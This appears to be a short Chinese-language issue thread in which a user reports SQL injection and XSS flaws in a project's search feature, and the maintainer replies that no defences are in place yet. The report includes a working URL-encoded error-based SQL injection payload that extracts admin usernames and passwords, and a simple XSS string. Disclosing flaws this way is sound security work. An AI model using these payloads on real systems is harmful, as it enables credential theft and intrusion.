搜索处SQL注入漏洞和XSS漏洞

[thiscodecc]

在搜索处请求如下参数会产生SQL注入漏洞 a1%27%20and%20updatexml(2,concat(0x7e,(SELECT%20concat(username,%27=%27,password)%20FROM%20admin_user)),0)%23 如图 输入如下参数会产生XSS漏洞 ";alert(1);//

[miansen]

谢谢您提出的问题~ 目前 SQL 注入和 XSS 攻击还没有做相应的防御措施